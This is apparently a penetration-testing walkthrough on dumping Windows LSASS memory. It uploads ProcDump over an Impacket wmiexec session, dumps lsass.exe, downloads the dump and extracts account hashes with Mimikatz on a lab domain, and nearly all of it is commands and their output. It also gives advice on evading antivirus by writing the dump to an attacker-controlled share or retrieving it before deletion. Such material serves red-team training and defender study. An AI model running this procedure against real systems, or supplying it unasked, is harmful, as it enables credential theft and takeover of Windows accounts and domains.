==================================================================================================================================
OS Credential Dumping (LSASS) using 'ProcDump' (Sysinternals)
==================================================================================================================================

After a user logs on a Windows computer, the system generates and stores a variety of credential materials in LSASS process memory. 
Our objective is to extract the password hashes of the local and/or domain accounts stored in the memory of the Local Security 
Authority Subsystem Service (LSASS process) of a target Windows computer. 
A valid local or domain Windows account member of the 'local administrator' group is required for dumping the LSASS process.

> Usefull link: https://attack.mitre.org/techniques/T1003/001/

ProcDump is a command-line utility that can be used as a general process dump utility.
> https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
> https://download.sysinternals.com/files/Procdump.zip

Command to dump the memory of the LSASS process with procdump: 
> procdump64.exe -accepteula -ma process.exe process.dmp

Important note regarding AV
---------------------------
Nowadays, most AV solutions including Windows Defender detect and delete the memory dump files of the LSASS process as soon as they
are written/saved on a Windows computer's disk. So if you want to use procdump it is recommended to save/write the dump file on a 
remote file share that we control or to try to download it using wmiexec before it gets deleted (but it is not always feasible).
In addition, several AV solutions flag 'procdump' as a malicious/hacking tool and delete it or forbid its execution.


==================================================================================================================================
Example 1. Use 'procdump64.exe' to dump the LSASS process memory of a Windows server and then 'Mimikatz.exe' to extract the hashes
==================================================================================================================================

-----------------------------------------------------------------------------------------------------------
Step 1 - Upload 'procdump64.exe' on a target Windows server & execute it to dump the LSASS process memory
-----------------------------------------------------------------------------------------------------------

jeff@kali:~/Documents/Tools/Sysinternals$ wmiexec.py administrator@192.168.1.50
Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation
Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

C:\>cd temp

C:\temp>put procdump64.exe
[*] Uploading procdump64.exe to C:\temp\procdump64.exe

C:\temp>procdump64.exe -accepteula -ma lsass.exe lsassdump.dmp

ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[22:56:50] Dump 1 initiated: C:\temp\lsassdump.dmp
[22:56:50] Dump 1 writing: Estimated dump file size is 100 MB.
[22:56:50] Dump 1 complete: 100 MB written in 0.1 seconds
[22:56:50] Dump count reached.

-----------------------------------------------------------------------------------------------------------------------------
Step 2 - Download the lssas dump file before it gets deleted by the AV & then extract the credentials with the tool Mimikatz 
-----------------------------------------------------------------------------------------------------------------------------

C:\temp>get lsassdump.dmp
[*] Downloading C:\\temp\lsassdump.dmp

C:\temp>

PS C:\temp> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Mar  8 2020 18:30:37
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # 

mimikatz # sekurlsa::minidump lsassdump.dmp
Switch to MINIDUMP : 'lsassdump.dmp'

mimikatz # sekurlsa::logonPasswords
Opening : 'lsassdump.dmp' file for minidump...

Authentication Id : 0 ; 183453 (00000000:0002cc9d)
Session           : Interactive from 1
User Name         : Administrator
Domain            : SECURITY-LAB
Logon Server      : TEMP-DC
Logon Time        : 4/17/2020 10:31:41 PM
SID               : S-1-5-21-3698357007-189532211-3203426890-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SECURITY-LAB
         * NTLM     : a134f40245c97f246e054cd562<snip>
         * SHA1     : 0e8ab5d5470221cc25a1198ed5<snip>
         [00010000] CredentialKeys
         * NTLM     : a134f40245c97f246e054cd562<snip>
         * SHA1     : 0e8ab5d5470221cc25a1198ed5<snip>
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : SECURITY-LAB
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SECURITY-TEST-LAB.LOCAL
         * Password : (null)
        ssp :   KO
        credman :
         [00000000]
         * Username : SECURITY-LAB\backup
         * Domain   : SECURITY-LAB\backup
         * Password : <snip>
<SNIP>
